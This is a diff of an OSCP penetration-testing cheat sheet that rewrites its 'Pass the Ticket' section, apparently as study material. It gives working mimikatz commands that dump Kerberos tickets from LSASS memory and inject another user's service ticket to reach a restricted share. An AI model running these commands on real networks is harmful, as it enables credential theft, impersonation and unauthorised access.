peterkhe1999/CheatSheet/OSCP/README.md

 ## Pass the Ticket

-This attack takes advantage of the TGS, which may be **exported** and re-injected elsewhere on the network and then used to authenticate to a specific service.
+TGS may be **exported** and re-injected elsewhere on the network and then used to authenticate to a specific service.

 If the service tickets belong to the current user, then no administrative privileges are required.

 E.g., To abuse an already existing session of dave.
 The dave user has privileged access to the backup folder located on WEB04 where our logged in user jen does not.

-Extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our own session.
-This will allow us to access the restricted folder.
+Extract all the current TGT/TGS in memory which is then saved to disk in the **kirbi** mimikatz format.

 ```
 privilege::debug
 sekurlsa::tickets /export
 ```

-The above command parsed the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the **kirbi** mimikatz format.

-Verify newly generated tickets with `dir`, filtering out on the **kirbi** extension
+Verify newly generated tickets, filtering out on the **kirbi** extension

 ```pwsh
 dir *.kirbi
 ```

+Inject dave's WEB04 TGS into our own session

 ```
 kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi